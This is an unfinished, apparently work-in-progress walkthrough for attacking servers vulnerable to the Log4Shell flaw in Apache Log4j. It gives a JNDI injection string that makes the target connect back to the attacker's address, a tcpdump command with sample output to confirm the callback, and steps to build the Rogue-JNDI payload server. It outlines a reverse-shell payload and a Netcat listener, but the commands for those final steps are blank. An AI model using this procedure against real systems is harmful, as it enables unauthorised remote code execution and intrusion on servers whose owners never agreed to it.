CVE - Log4Shell (WIP)

Log4Shell is a critical vulnerability, tracked as CVE-2021-44228, in the Apache Log4j library, which is widely used for logging in Java applications. Vulnerable versions resolve JNDI lookups (${jndi:...}) found inside logged strings, so an attacker who can get a crafted string into any value that ends up in a log message can make the server fetch attacker-controlled content from a remote server and execute arbitrary code.

The following is one way to attack a target affected by this vulnerability:

  • Send a payload to confirm the server is connecting back

# Insert this payload at the vulnerable input (any value the application logs: a header, a form field, a URL parameter)
${jndi:ldap://$IP/test} # Specify your IP; with no port given, LDAP defaults to 389

# Capture traffic on our machine; nothing has to be listening on the port, a connection attempt is enough
sudo tcpdump -i $interface port $LDAPport # Specify the network interface you are using and the LDAP port, which by default is 389

# If it works, we will see a result like this: the [S] line is the target's SYN, the [R.] line is our
# kernel resetting it because nothing listens on 389. That is enough to prove the lookup was triggered
# and that the target can reach us on that port.
01:02:56.775423 IP $TargetIP.48214 > $OurIP.ldap: Flags [S], seq 1793598680, win 64240, options [mss 1340,sackOK,TS val 2750652936 ecr 0,nop,wscale 7], length 0
01:02:56.775456 IP $OurIP.ldap > $TargetIP.48214: Flags [R.], seq 0, ack 1793598681, win 0, length 0

  • Install the Java tools needed to build the payload server

sudo apt install maven
sudo apt install openjdk-24-jdk # Use whichever JDK version your distribution ships; a full JDK (not only a JRE) is required because Maven compiles the project

  • Download and build the Rogue-JNDI Java application

git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package # The built jar ends up under target/

  • Create the payload to use

This example uses a reverse shell, but it could be any command desired for the RCE. We base64-encode the command so that its spaces, quotes, pipes and redirections do not get mangled on the way through Rogue-JNDI to the target.


  • Start the Rogue-JNDI application, passing in the payload


  • (Optional) Set up a Netcat listener

Only needed for the reverse-shell example: it receives the connection from the target once the payload runs.


  • Trigger the payload through the vulnerable input, sending a JNDI string that points at the Rogue-JNDI server instead of the test port
